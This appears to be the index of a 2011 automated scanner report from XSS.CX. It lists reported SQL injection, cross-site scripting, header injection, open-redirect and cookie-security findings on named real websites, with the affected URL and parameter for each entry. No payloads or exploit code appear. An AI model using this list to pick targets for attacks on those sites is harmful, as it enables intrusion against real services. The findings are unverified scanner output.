XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 06142011-01

Report generated by XSS.CX at Tue Jun 14 08:10:34 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

1. SQL injection

1.1. http://ad.doubleclick.net/adj/interactive.wsj.com/tech_main_story [;page parameter]

1.2. http://js.microsoft.com/library/svy/windows/broker-config.js [REST URL parameter 2]

1.3. http://l.apture.com/v3/ [name of an arbitrarily supplied request parameter]

1.4. http://om.dowjoneson.com/b/ss/djglobal,djwsj/1/H.20.3/s22808814137242 [REST URL parameter 1]

1.5. http://s0.wp.com/wp-content/themes/h4/i/ajax-loader.gif [REST URL parameter 4]

1.6. http://s0.wp.com/wp-content/themes/h4/i/header-bg.png [REST URL parameter 2]

1.7. http://s1.wp.com/wp-includes/js/swfobject.js [REST URL parameter 2]

1.8. http://static0.fluxstatic.com/-/Clients/Common/JS/Controls/ButtonControl.js [REST URL parameter 1]

1.9. http://static1.fluxstatic.com/-/Clients/Common/JS/Controls/OverlayPanel.js [REST URL parameter 5]

1.10. http://static2.fluxstatic.com/-/Clients/Common/JS/Common/AjaxBaseControl.js [REST URL parameter 2]

1.11. http://static3.fluxstatic.com/-/Clients/Common/JS/Common/AjaxBasePage.js [REST URL parameter 1]

1.12. http://static3.fluxstatic.com/-/Clients/Common/JS/Controls/PrefilledTextBox.js [REST URL parameter 3]

1.13. http://static3.fluxstatic.com/-/Clients/Common/JS/Controls/PrefilledTextBox.js [REST URL parameter 5]

2. HTTP header injection

2.1. http://ad.doubleclick.net/activity [REST URL parameter 1]

2.2. http://ad.doubleclick.net/ad/N3282.wsj.com/B3951656 [REST URL parameter 1]

2.3. http://ad.doubleclick.net/adi/N447.153730.YAHOO.COM/B5548365.27 [REST URL parameter 1]

2.4. http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber [REST URL parameter 1]

2.5. http://ad.doubleclick.net/adi/interactive.wsj.com/tech_front [REST URL parameter 1]

2.6. http://ad.doubleclick.net/adi/interactive.wsj.com/tech_main_story [REST URL parameter 1]

2.7. http://ad.doubleclick.net/adi/mtv.mtvi/atf_i_s/mv/videos/mike-taylor/_659420/perfect [REST URL parameter 1]

2.8. http://ad.doubleclick.net/adi/mtv.mtvi/btf_i_s/mv/videos/mike-taylor/_659420/perfect [REST URL parameter 1]

2.9. http://ad.doubleclick.net/adi/mtv.mtvi/survey [REST URL parameter 1]

2.10. http://ad.doubleclick.net/adj/interactive.wsj.com/tech_front [REST URL parameter 1]

2.11. http://ad.doubleclick.net/adj/interactive.wsj.com/tech_main_story [REST URL parameter 1]

2.12. http://ad.doubleclick.net/adj/mtv.mtvi/atf_j_s/music/_mn [REST URL parameter 1]

2.13. http://ad.doubleclick.net/adj/mtv.mtvi/atf_j_s/mv/videos/mike-taylor/_659420/perfect [REST URL parameter 1]

2.14. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/_hp [REST URL parameter 1]

2.15. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/music/_mn [REST URL parameter 1]

3. Cross-site scripting (reflected)

3.1. http://ad.doubleclick.net/adi/N5155.152847.2342166290621/B5116932.9 [name of an arbitrarily supplied request parameter]

3.2. http://ad.doubleclick.net/adi/N5155.152847.2342166290621/B5116932.9 [sz parameter]

3.3. http://ad.doubleclick.net/adi/interactive.wsj.com/tech_front [;s parameter]

3.4. http://ad.doubleclick.net/adi/interactive.wsj.com/tech_front [name of an arbitrarily supplied request parameter]

3.5. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.7522770736832172 [click parameter]

3.6. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.7522770736832172 [name of an arbitrarily supplied request parameter]

3.7. http://api.bizographics.com/v1/profile.json [&callback parameter]

3.8. http://api.bizographics.com/v1/profile.json [api_key parameter]

3.9. http://ar.voicefive.com/b/node_rcAll.pli [func parameter]

3.10. http://b.scorecardresearch.com/beacon.js [c1 parameter]

3.11. http://b.scorecardresearch.com/beacon.js [c15 parameter]

3.12. http://b.scorecardresearch.com/beacon.js [c2 parameter]

3.13. http://b.scorecardresearch.com/beacon.js [c3 parameter]

3.14. http://b.scorecardresearch.com/beacon.js [c4 parameter]

3.15. http://b.scorecardresearch.com/beacon.js [c5 parameter]

3.16. http://b.scorecardresearch.com/beacon.js [c6 parameter]

3.17. http://daapiak.flux.com/2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/Feeds/Comments/-/threaded [includeWBR&callback parameter]

3.18. http://daapiak.flux.com/2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/Feeds/Content/ [callback parameter]

3.19. http://daapiak.flux.com/2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/Feeds/Content/Usage [callback parameter]

3.20. http://daapiak.flux.com/2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/UI/ShareService/Services [callback parameter]

3.21. http://en.gravatar.com/site/implement [REST URL parameter 1]

3.22. http://en.gravatar.com/site/login/%252F [REST URL parameter 1]

3.23. http://en.gravatar.com/site/login/%252F [REST URL parameter 3]

3.24. http://intensedebate.com/ [name of an arbitrarily supplied request parameter]

3.25. http://js.revsci.net/gateway/gw.js [csid parameter]

3.26. http://members.pega.com/cookiecheck.asp [pcd parameter]

3.27. http://members.pega.com/login.asp [name of an arbitrarily supplied request parameter]

3.28. http://pglb.buzzfed.com/63975/17983acd3149cc7b59eebf3385392137 [callback parameter]

3.29. http://s.intensedebate.com/css/sys.css [REST URL parameter 2]

3.30. http://s.intensedebate.com/images/automattic.png [REST URL parameter 2]

3.31. http://s.intensedebate.com/images/home-sites-sprite.jpg [REST URL parameter 2]

3.32. http://s.intensedebate.com/images/home-sprite.png [REST URL parameter 2]

3.33. http://s.intensedebate.com/images/sprite.png [REST URL parameter 2]

3.34. http://s.intensedebate.com/js/idm-combined.js [REST URL parameter 2]

3.35. http://www.flickr.com/apps/badge/badge_iframe.gne [zg_bg_color parameter]

3.36. http://www.flickr.com/apps/badge/badge_iframe.gne [zg_person_id parameter]

3.37. http://www.forexfactory.com/excal.php [colors[2] parameter]

3.38. http://www.forexfactory.com/excal.php [colors[4] parameter]

3.39. http://www.forexfactory.com/excal.php [colors[8] parameter]

3.40. http://www.forexfactory.com/ws_cal.php [colors[2] parameter]

3.41. http://www.forexfactory.com/ws_cal.php [colors[4] parameter]

3.42. http://www.forexfactory.com/ws_cal.php [colors[8] parameter]

3.43. http://www.mtv.com/games/arcade/game/play.jhtml [arcadeGameId parameter]

3.44. http://www.mtv.com/global/music/scripts/reportFluxView.jhtml [uri parameter]

3.45. http://www.mtv.com/global/music/scripts/reportFluxView.jhtml [uri parameter]

3.46. http://www.mtv.com/sitewide/scripts/reportIMX.jhtml [arcadeGameId parameter]

3.47. http://api.bizographics.com/v1/profile.json [Referer HTTP header]

3.48. http://ar.voicefive.com/b/node_rcAll.pli [BMX_3PC cookie]

3.49. http://ar.voicefive.com/b/node_rcAll.pli [BMX_BR cookie]

3.50. http://ar.voicefive.com/b/node_rcAll.pli [UID cookie]

3.51. http://ar.voicefive.com/b/node_rcAll.pli [ar_p101866669 cookie]

3.52. http://ar.voicefive.com/b/node_rcAll.pli [ar_p101945457 cookie]

3.53. http://ar.voicefive.com/b/node_rcAll.pli [ar_p104567837 cookie]

3.54. http://ar.voicefive.com/b/node_rcAll.pli [ar_p20101109 cookie]

3.55. http://ar.voicefive.com/b/node_rcAll.pli [ar_p56282763 cookie]

3.56. http://ar.voicefive.com/b/node_rcAll.pli [ar_p81479006 cookie]

3.57. http://ar.voicefive.com/b/node_rcAll.pli [ar_p82806590 cookie]

3.58. http://ar.voicefive.com/b/node_rcAll.pli [ar_p84552060 cookie]

3.59. http://ar.voicefive.com/b/node_rcAll.pli [ar_p91143664 cookie]

3.60. http://ar.voicefive.com/b/node_rcAll.pli [ar_p97174789 cookie]

3.61. http://ar.voicefive.com/b/node_rcAll.pli [ar_p97464717 cookie]

3.62. http://ar.voicefive.com/bmx3/node.pli [BMX_BR cookie]

3.63. http://ar.voicefive.com/bmx3/node.pli [UID cookie]

3.64. http://ar.voicefive.com/bmx3/node.pli [ar_p101866669 cookie]

3.65. http://ar.voicefive.com/bmx3/node.pli [ar_p101945457 cookie]

3.66. http://ar.voicefive.com/bmx3/node.pli [ar_p104567837 cookie]

3.67. http://ar.voicefive.com/bmx3/node.pli [ar_p20101109 cookie]

3.68. http://ar.voicefive.com/bmx3/node.pli [ar_p56282763 cookie]

3.69. http://ar.voicefive.com/bmx3/node.pli [ar_p81479006 cookie]

3.70. http://ar.voicefive.com/bmx3/node.pli [ar_p82806590 cookie]

3.71. http://ar.voicefive.com/bmx3/node.pli [ar_p84552060 cookie]

3.72. http://ar.voicefive.com/bmx3/node.pli [ar_p91143664 cookie]

3.73. http://ar.voicefive.com/bmx3/node.pli [ar_p97174789 cookie]

3.74. http://ar.voicefive.com/bmx3/node.pli [ar_p97464717 cookie]

4. Flash cross-domain policy

4.1. http://0.gravatar.com/crossdomain.xml

4.2. http://1.gravatar.com/crossdomain.xml

4.3. http://2.gravatar.com/crossdomain.xml

4.4. http://a.tribalfusion.com/crossdomain.xml

4.5. http://ad.doubleclick.net/crossdomain.xml

4.6. http://ads.pointroll.com/crossdomain.xml

4.7. http://ar.voicefive.com/crossdomain.xml

4.8. http://b.scorecardresearch.com/crossdomain.xml

4.9. http://b.voicefive.com/crossdomain.xml

4.10. http://bs.serving-sys.com/crossdomain.xml

4.11. http://community.mtv.com/crossdomain.xml

4.12. http://d3.zedo.com/crossdomain.xml

4.13. http://d7.zedo.com/crossdomain.xml

4.14. http://daapiak.flux.com/crossdomain.xml

4.15. http://ds.serving-sys.com/crossdomain.xml

4.16. http://en.gravatar.com/crossdomain.xml

4.17. http://farm1.static.flickr.com/crossdomain.xml

4.18. http://farm2.static.flickr.com/crossdomain.xml

4.19. http://farm3.static.flickr.com/crossdomain.xml

4.20. http://farm4.static.flickr.com/crossdomain.xml

4.21. http://farm5.static.flickr.com/crossdomain.xml

4.22. http://farm6.static.flickr.com/crossdomain.xml

4.23. http://fls.doubleclick.net/crossdomain.xml

4.24. http://gs.mtv.com/crossdomain.xml

4.25. http://i0.poll.fm/crossdomain.xml

4.26. http://ib.adnxs.com/crossdomain.xml

4.27. http://imx.mtv.com/crossdomain.xml

4.28. http://js.revsci.net/crossdomain.xml

4.29. http://l.yimg.com/crossdomain.xml

4.30. http://log30.doubleverify.com/crossdomain.xml

4.31. http://m.webtrends.com/crossdomain.xml

4.32. http://m1.zedo.com/crossdomain.xml

4.33. http://mswindowswolglobal.112.2o7.net/crossdomain.xml

4.34. http://mtv.mtvnimages.com/crossdomain.xml

4.35. http://now.eloqua.com/crossdomain.xml

4.36. http://om.dowjoneson.com/crossdomain.xml

4.37. http://ping1.unicast.com/crossdomain.xml

4.38. http://pix04.revsci.net/crossdomain.xml

4.39. http://pixel.quantserve.com/crossdomain.xml

4.40. http://puma.vizu.com/crossdomain.xml

4.41. http://s.gravatar.com/crossdomain.xml

4.42. http://secure-us.imrworldwide.com/crossdomain.xml

4.43. http://spd.pointroll.com/crossdomain.xml

4.44. http://spe.atdmt.com/crossdomain.xml

4.45. http://speed.pointroll.com/crossdomain.xml

4.46. http://static0.fluxstatic.com/crossdomain.xml

4.47. http://static1.fluxstatic.com/crossdomain.xml

4.48. http://static2.fluxstatic.com/crossdomain.xml

4.49. http://static3.fluxstatic.com/crossdomain.xml

4.50. http://t.flux.com/crossdomain.xml

4.51. http://t.pointroll.com/crossdomain.xml

4.52. http://tcr.tynt.com/crossdomain.xml

4.53. http://viamtv.112.2o7.net/crossdomain.xml

4.54. http://widgets.flux.com/crossdomain.xml

4.55. http://widgetsak.flux.com/crossdomain.xml

4.56. http://www.forexfactory.com/crossdomain.xml

4.57. http://www.mtv.com/crossdomain.xml

4.58. http://ad.wsod.com/crossdomain.xml

4.59. http://advertising.yahoo.com/crossdomain.xml

4.60. http://api.tweetmeme.com/crossdomain.xml

4.61. http://cm.mtv.overture.com/crossdomain.xml

4.62. http://feeds.bbci.co.uk/crossdomain.xml

4.63. http://geo.yahoo.com/crossdomain.xml

4.64. http://googleads.g.doubleclick.net/crossdomain.xml

4.65. http://my.yahoo.com/crossdomain.xml

4.66. http://newsrss.bbc.co.uk/crossdomain.xml

4.67. http://online.wsj.com/crossdomain.xml

4.68. http://p.opt.fimserve.com/crossdomain.xml

4.69. http://static.ak.fbcdn.net/crossdomain.xml

4.70. http://us.adserver.yahoo.com/crossdomain.xml

4.71. http://www.facebook.com/crossdomain.xml

4.72. http://api.twitter.com/crossdomain.xml

4.73. https://edit.yahoo.com/crossdomain.xml

4.74. http://s0.videopress.com/crossdomain.xml

4.75. http://stats.wordpress.com/crossdomain.xml

4.76. http://videopress.com/crossdomain.xml

4.77. http://yadvertisingblog.app3.hubspot.com/crossdomain.xml

5. Silverlight cross-domain policy

5.1. http://ad.doubleclick.net/clientaccesspolicy.xml

5.2. http://ads.pointroll.com/clientaccesspolicy.xml

5.3. http://b.scorecardresearch.com/clientaccesspolicy.xml

5.4. http://b.voicefive.com/clientaccesspolicy.xml

5.5. http://mswindowswolglobal.112.2o7.net/clientaccesspolicy.xml

5.6. http://om.dowjoneson.com/clientaccesspolicy.xml

5.7. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

5.8. http://spd.pointroll.com/clientaccesspolicy.xml

5.9. http://spe.atdmt.com/clientaccesspolicy.xml

5.10. http://speed.pointroll.com/clientaccesspolicy.xml

5.11. http://stats.wordpress.com/clientaccesspolicy.xml

5.12. http://viamtv.112.2o7.net/clientaccesspolicy.xml

5.13. http://windows.microsoft.com/clientaccesspolicy.xml

5.14. http://js.microsoft.com/clientaccesspolicy.xml

5.15. http://www.microsoft.com/clientaccesspolicy.xml

6. Cleartext submission of password

6.1. http://community.mtv.com/Overlays/LogIn.aspx

6.2. http://en.gravatar.com/

6.3. http://en.gravatar.com/site/login/%252F

6.4. http://members.pega.com/login.asp

6.5. http://online.wsj.com/article/SB10001424052702304665904576383880754844512.html

6.6. http://online.wsj.com/article/SB10001424052702304665904576383880754844512.html

6.7. http://www.livewithoscar.com/Calendar.aspx

6.8. http://www.livewithoscar.com/Chat.aspx

6.9. http://www.livewithoscar.com/DailyOmni.aspx

6.10. http://www.livewithoscar.com/FlashIframe.aspx

7. XML injection

7.1. http://platform.twitter.com/widgets/follow_button.html [REST URL parameter 1]

7.2. http://platform.twitter.com/widgets/follow_button.html [REST URL parameter 2]

7.3. http://r.nexac.com/e/getdata.xgi [REST URL parameter 1]

7.4. http://r.nexac.com/e/getdata.xgi [REST URL parameter 2]

8. Session token in URL

8.1. http://pixel.alexametrics.com/atrk.gif

8.2. http://www.facebook.com/extern/login_status.php

9. SSL certificate

9.1. https://login.yahoo.com/

9.2. https://buy.wsj.com/

9.3. https://edit.yahoo.com/

9.4. https://en.wordpress.com/

9.5. https://login21.marketingsolutions.yahoo.com/

9.6. https://marketingsolutions.login.yahoo.com/

10. Open redirection

10.1. http://b.scorecardresearch.com/r [d.c parameter]

10.2. http://r.nexac.com/e/getdata.xgi [ru parameter]

11. Cookie scoped to parent domain

11.1. http://a.analytics.yahoo.com/fpc.pl

11.2. http://a.analytics.yahoo.com/p.pl

11.3. http://gs.mtv.com/games/playgame.php

11.4. http://www.forexfactory.com/excal.php

11.5. http://a.tribalfusion.com/j.ad

11.6. http://ad.doubleclick.net/clk

11.7. http://ads.pointroll.com/PortalServe/

11.8. http://api.bizographics.com/v1/profile.json

11.9. http://ar.voicefive.com/b/recruitBeacon.pli

11.10. http://b.scorecardresearch.com/b

11.11. http://b.scorecardresearch.com/r

11.12. http://b.voicefive.com/p

11.13. http://bs.serving-sys.com/BurstingPipe/adServer.bs

11.14. http://c.microsoft.com/trans_pixel.asp

11.15. http://cf.addthis.com/red/p.json

11.16. http://cm.mtv.overture.com/js_flat_1_0/

11.17. http://en.wordpress.com/signup/

11.18. http://ib.adnxs.com/pxj

11.19. http://id.google.com/verify/EAAAAHyt9BxLLTssjy25y0llsBc.gif

11.20. http://imx.mtv.com/sitewide/droplets/view_gen.jhtml

11.21. http://js.revsci.net/gateway/gw.js

11.22. http://leadback.advertising.com/adcedge/lb

11.23. https://marketingsolutions.login.yahoo.com/adui/signin/displaySignin.do

11.24. http://p.opt.fimserve.com/bht/

11.25. http://pix04.revsci.net/D08734/a1/0/3/0.js

11.26. http://pix04.revsci.net/G07608/a4/0/0/pcx.js

11.27. http://px.owneriq.net/ep

11.28. http://stgapi.choicestream.com/instr/csanywhere.js

11.29. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s21898508197627

11.30. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s23534710153471

11.31. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s25478533639106

11.32. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s25953703850973

11.33. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s26489939151797

11.34. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s27362804291769

11.35. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s27566767793614

11.36. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s94813384910564

11.37. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s9683568101997

11.38. http://www.alexa.com/

11.39. http://www.bizographics.com/collect/

11.40. http://www.burstnet.com/burstnetwork/display/s=21868/a=t/v=4.0S/sz=1X1A/BCPG173588.250890.299265/

11.41. http://www.flickr.com/about/

11.42. http://www.flickr.com/abuse/

11.43. http://www.flickr.com/beacon_page_timings.gne

11.44. http://www.flickr.com/flanal_event.gne

11.45. http://www.flickr.com/fragment.gne

11.46. http://www.flickr.com/report_abuse.gne

11.47. http://www.flickr.com/signin

11.48. http://www.pega.com/user

12. Cookie without HttpOnly flag set

12.1. http://a.analytics.yahoo.com/fpc.pl

12.2. http://a.analytics.yahoo.com/p.pl

12.3. http://gs.mtv.com/games/playgame.php

12.4. http://imx.mtv.com/sitewide/droplets/view_gen.jhtml

12.5. https://marketingsolutions.login.yahoo.com/adui/signin/displaySignin.do

12.6. http://a.tribalfusion.com/j.ad

12.7. http://ad.doubleclick.net/clk

12.8. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307974284**

12.9. http://ad.yieldmanager.com/imp

12.10. http://ads.pointroll.com/PortalServe/

12.11. http://api.bizographics.com/v1/profile.json

12.12. http://ar.voicefive.com/b/recruitBeacon.pli

12.13. http://aux1.forexfactory.com/www/delivery/lg.php

12.14. http://b.scorecardresearch.com/b

12.15. http://b.scorecardresearch.com/r

12.16. http://b.voicefive.com/p

12.17. http://bs.serving-sys.com/BurstingPipe/adServer.bs

12.18. http://c.microsoft.com/trans_pixel.asp

12.19. http://cf.addthis.com/red/p.json

12.20. http://cm.mtv.overture.com/js_flat_1_0/

12.21. http://community.mtv.com/Overlays/LogIn.aspx

12.22. http://community.mtv.com/ScriptResource.axd

12.23. http://community.mtv.com/WebResource.axd

12.24. http://en.wordpress.com/signup/

12.25. http://flickr.com/

12.26. http://js.revsci.net/gateway/gw.js

12.27. http://leadback.advertising.com/adcedge/lb

12.28. http://m.webtrends.com/dcsaukzid100008i3dphd1nqy_6p8b/dcs.gif

12.29. http://my.yahoo.com/e/df

12.30. http://p.opt.fimserve.com/bht/

12.31. http://pix04.revsci.net/D08734/a1/0/3/0.js

12.32. http://pix04.revsci.net/G07608/a4/0/0/pcx.js

12.33. http://px.owneriq.net/ep

12.34. http://sales.liveperson.net/hc/12987554/

12.35. http://stgapi.choicestream.com/instr/csanywhere.js

12.36. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s21898508197627

12.37. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s23534710153471

12.38. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s25478533639106

12.39. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s25953703850973

12.40. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s26489939151797

12.41. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s27362804291769

12.42. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s27566767793614

12.43. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s94813384910564

12.44. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s9683568101997

12.45. http://www.alexa.com/

12.46. http://www.bizographics.com/collect/

12.47. http://www.burstnet.com/burstnetwork/display/s=21868/a=t/v=4.0S/sz=1X1A/BCPG173588.250890.299265/

12.48. http://www.burstnet.com/cgi-bin/ads/ad21868k.cgi/v=2.3S/sz=728x90A/55035/NF/RETURN-CODE/JS/

12.49. http://www.burstnet.com/cgi-bin/ads/ad21868v.cgi/v=2.3S/sz=728x90A/31221/NF/RETURN-CODE/JS/

12.50. http://www.burstnet.com/cgi-bin/ads/ad21868w.cgi/v=2.3S/sz=300x250A/NZ/54723/NF/RETURN-CODE/JS/

12.51. http://www.burstnet.com/cgi-bin/ads/ad21868w.cgi/v=2.3S/sz=728x90A/92519/NF/RETURN-CODE/JS/

12.52. http://www.flickr.com/about/

12.53. http://www.flickr.com/abuse/

12.54. http://www.flickr.com/beacon_page_timings.gne

12.55. http://www.flickr.com/flanal_event.gne

12.56. http://www.flickr.com/fragment.gne

12.57. http://www.flickr.com/report_abuse.gne

12.58. http://www.flickr.com/signin

12.59. http://www.forexfactory.com/excal.php

12.60. http://yadvertisingblog.app3.hubspot.com/salog.js.aspx

13. Password field with autocomplete enabled

13.1. https://buy.wsj.com/shopandbuy/order/subscribe.jsp

13.2. https://buy.wsj.com/shopandbuy/order/subscribe.jsp

13.3. http://community.mtv.com/Overlays/LogIn.aspx

13.4. http://community.mtv.com/Overlays/LogIn.aspx

13.5. http://community.mtv.com/Overlays/LogIn.aspx

13.6. http://community.mtv.com/Overlays/LogIn.aspx

13.7. https://edit.yahoo.com/registration

13.8. http://en.gravatar.com/

13.9. http://en.gravatar.com/site/login/%252F

13.10. https://en.wordpress.com/signup/

13.11. https://login.yahoo.com/config/login

13.12. https://marketingsolutions.login.yahoo.com/adui/signin/displaySignin.do

13.13. http://online.wsj.com/article/SB10001424052702304665904576383880754844512.html

13.14. http://online.wsj.com/article/SB10001424052702304665904576383880754844512.html

13.15. http://wordpress.com/

13.16. http://www.livewithoscar.com/Calendar.aspx

13.17. http://www.livewithoscar.com/Chat.aspx

13.18. http://www.livewithoscar.com/DailyOmni.aspx

13.19. http://www.livewithoscar.com/FlashIframe.aspx

14. Source code disclosure

15. Referer-dependent response

15.1. http://api.bizographics.com/v1/profile.json

15.2. http://use.typekit.com/k/nop2chq-e.css

15.3. http://www.facebook.com/plugins/fan.php

15.4. http://www.facebook.com/plugins/like.php

15.5. http://www.flickr.com/about/

15.6. http://www.flickr.com/abuse/

15.7. http://www.flickr.com/apps/badge/badge_iframe.gne

15.8. http://www.flickr.com/report_abuse.gne

16. Cross-domain POST

17. SSL cookie without secure flag set

18. Cross-domain Referer leakage

18.1. http://ad.doubleclick.net/adi/N1558.66.ALEXAINTERNET/B4971267

18.2. http://ad.doubleclick.net/adi/N447.153730.YAHOO.COM/B5548365.27

18.3. http://ad.doubleclick.net/adi/N5155.152847.2342166290621/B5116932.9

18.4. http://ad.doubleclick.net/adi/N5621.66.2412875475321/B4682155

18.5. http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber

18.6. http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber

18.7. http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber

18.8. http://ad.doubleclick.net/adi/interactive.wsj.com/tech_front

18.9. http://ad.doubleclick.net/adi/interactive.wsj.com/tech_front

18.10. http://ad.doubleclick.net/adi/interactive.wsj.com/tech_main_story

18.11. http://ad.doubleclick.net/adi/interactive.wsj.com/tech_main_story

18.12. http://ad.doubleclick.net/adi/interactive.wsj.com/tech_main_story

18.13. http://ad.doubleclick.net/adi/interactive.wsj.com/tech_main_story

18.14. http://ad.doubleclick.net/adi/mtv.mtvi/atf_i_s/mv/videos/mike-taylor/_659420/perfect

18.15. http://ad.doubleclick.net/adi/mtv.mtvi/btf_i_s/mv/videos/mike-taylor/_659420/perfect

18.16. http://ad.doubleclick.net/adi/mtv.mtvi/survey

18.17. http://ad.doubleclick.net/adi/mtv.mtvi/survey

18.18. http://ad.doubleclick.net/adj/mtv.mtvi/atf_j_s/_hp

18.19. http://ad.doubleclick.net/adj/mtv.mtvi/atf_j_s/shows/_mn

18.20. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/_hp

18.21. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/_hp

18.22. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/games/arcade/game/play

18.23. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/games/arcade/game/play

18.24. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/games/arcade/index

18.25. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/music/_mn

18.26. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/music/_mn

18.27. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/shows/_mn

18.28. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/shows/_mn

18.29. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/shows/teen_wolf/series

18.30. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/shows/teen_wolf/series

18.31. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.7522770736832172

18.32. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307974284**

18.33. http://api.twitter.com/1/FanSided/lists//statuses.json

18.34. http://community.mtv.com/Overlays/LogIn.aspx

18.35. https://edit.yahoo.com/forgotroot

18.36. https://edit.yahoo.com/registration

18.37. http://fls.doubleclick.net/activityi

18.38. https://login.yahoo.com/config/login

18.39. https://login.yahoo.com/config/login

18.40. http://members.pega.com/cookiecheck.asp

18.41. http://members.pega.com/pages/css/sites/all/modules/contrib/lightbox2/css/lightbox.css

18.42. http://my.yahoo.com/darla/fc.php

18.43. http://my.yahoo.com/darla/fc.php

18.44. http://my.yahoo.com/darla/fc.php

18.45. http://my.yahoo.com/darla/fc.php

18.46. http://online.wsj.com/article/SB10001424052702304665904576383880754844512.html

18.47. http://platform.twitter.com/widgets/follow_button.html

18.48. http://platform0.twitter.com/widgets/follow_button.html

18.49. http://s0.videopress.com/js/videopress.js

18.50. http://s2.wp.com/wp-content/mu-plugins/sharing/sharing.js

18.51. http://static0.fluxstatic.com/-/Clients/Common/JS/Common/Overlay.js

18.52. http://us.havaianas.com/front/templates/fragments/recently-viewed.jsp

18.53. http://widgets.flux.com/-/GetAuthCookie.ashx

18.54. http://widgets.flux.com/-/GetAuthCookie.ashx

18.55. http://wordpress.com/signup/

18.56. http://www.facebook.com/plugins/fan.php

18.57. http://www.facebook.com/plugins/like.php

18.58. http://www.flickr.com/apps/badge/badge_iframe.gne

18.59. http://www.flickr.com/apps/badge/badge_iframe.gne

18.60. http://www.flickr.com/apps/badge/badge_iframe.gne

18.61. http://www.flickr.com/fragment.gne

18.62. http://www.google.com/search

18.63. http://www.mtv.com/games/arcade/game/play.jhtml

18.64. http://www.mtv.com/videos/lite/desktop/js/lib.jhtml

18.65. http://www.mtv.com/xd_flux.html

19. Cross-domain script include

19.1. http://ad.doubleclick.net/adi/N1558.66.ALEXAINTERNET/B4971267

19.2. http://ad.doubleclick.net/adi/N5155.152847.2342166290621/B5116932.9

19.3. http://ad.doubleclick.net/adi/mtv.mtvi/atf_i_s/mv/videos/mike-taylor/_659420/perfect

19.4. http://ad.doubleclick.net/adi/mtv.mtvi/survey

19.5. http://ad.doubleclick.net/adi/mtv.mtvi/survey

19.6. http://chartupload.com/

19.7. http://chartupload.com/gallery.php

19.8. http://community.mtv.com/Overlays/LogIn.aspx

19.9. http://d3.zedo.com//ads3/k/1219/959680/2317/1000002/i.js

19.10. http://en.gravatar.com/

19.11. http://en.gravatar.com/account/forgot-password/

19.12. http://en.gravatar.com/site/implement

19.13. http://en.gravatar.com/site/login/%252F

19.14. http://en.gravatar.com/site/signup/

19.15. https://en.wordpress.com/signup/

19.16. http://intensedebate.com/

19.17. https://login.yahoo.com/config/login

19.18. https://marketingsolutions.login.yahoo.com/adui/signin/displaySignin.do

19.19. http://online.wsj.com/article/SB10001424052702304665904576383880754844512.html

19.20. http://us.havaianas.com/MYOH.html

19.21. http://videopress.com/

19.22. http://windows.microsoft.com/en-US/internet-explorer/downloads/ie-9/worldwide-languages

19.23. http://windows.microsoft.com/en-US/internet-explorer/products/ie/home

19.24. http://wordpress.com/

19.25. http://www.alexa.com/

19.26. http://www.facebook.com/plugins/fan.php

19.27. http://www.facebook.com/plugins/like.php

19.28. http://www.flickr.com/

19.29. http://www.flickr.com/about/

19.30. http://www.flickr.com/abuse/

19.31. http://www.flickr.com/apps/badge/badge_iframe.gne

19.32. http://www.flickr.com/report_abuse.gne

19.33. http://www.livewithoscar.com/Calendar.aspx

19.34. http://www.mtv.com/

19.35. http://www.mtv.com/games/arcade/

19.36. http://www.mtv.com/games/arcade/game/play.jhtml

19.37. http://www.mtv.com/music/

19.38. http://www.mtv.com/shows/teen_wolf/series.jhtml

